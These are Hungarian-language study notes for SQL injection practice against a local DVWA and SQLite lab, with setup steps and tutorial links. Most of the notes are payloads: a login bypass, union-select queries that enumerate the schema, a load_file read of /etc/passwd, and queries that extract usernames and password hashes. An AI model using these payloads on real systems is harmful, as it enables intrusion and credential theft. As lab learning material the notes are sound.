sql injection
kell apache2 (van kalin) és php sqlite-al (sudo apt-get install php5-sqlite; /etc/init.d/apache2 restart)

login jelszó nélkül EHA';#
Date mező:
' union select 1, name from sqlite_master where type = 'table';# --> milyen táblák vannak a db-ben
' union select name, sql from sqlite_master where type = 'table';# ---> oszlopok
' union select name, pwd from users;

// DVWA telepitese: https://www.youtube.com/watch?v=5BG6iq_AUvM
// elerhetoseg: 10.107.97.1/dvwa + admin - password
// Fontos: sudo service apache2 start + DVWA Security-ben a Sec. Level-t beallitani

https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson6/index.html
http://backtracktut.blogspot.hu/2013/08/sql-injection_8.html
https://pentestlab.blog/2012/09/18/sql-injection-exploitation-dvwa/

- ' or 1=1 # // user-ek

- 4' order by 1 # // a 4. user

- ' and 1=1 union select database(),version() # // db nev es sql szerver verzio

- %' or 0=0 union select null, user() # // db user - az eredmeny aljan

- %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'# // a password infot tartalmazo tabla neve (a masodik surname)

- ' and 1=1 union select null,table_schema from information_schema.tables # //tablak a szerveren

- ' and 1=1 union select table_name,table_schema from information_schema.tables where table_schema='TABLA_NEVE' # //milyen user hasznalja a tablat, pl:a dvwa tablat

- ' and 1=1 union select first_name,password from ADATBAZIS.users # // milyen felhasznalok vannak a kivalaszott adatbazisban , pl: dvwa

- ' union SELECT 1, load_file('/etc/passwd') #

- ' union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != ADATBAZIS # // db tablai es sorai

- %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' # // oszlop field-ek megjelenitese

- %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users # // password hash megszerzese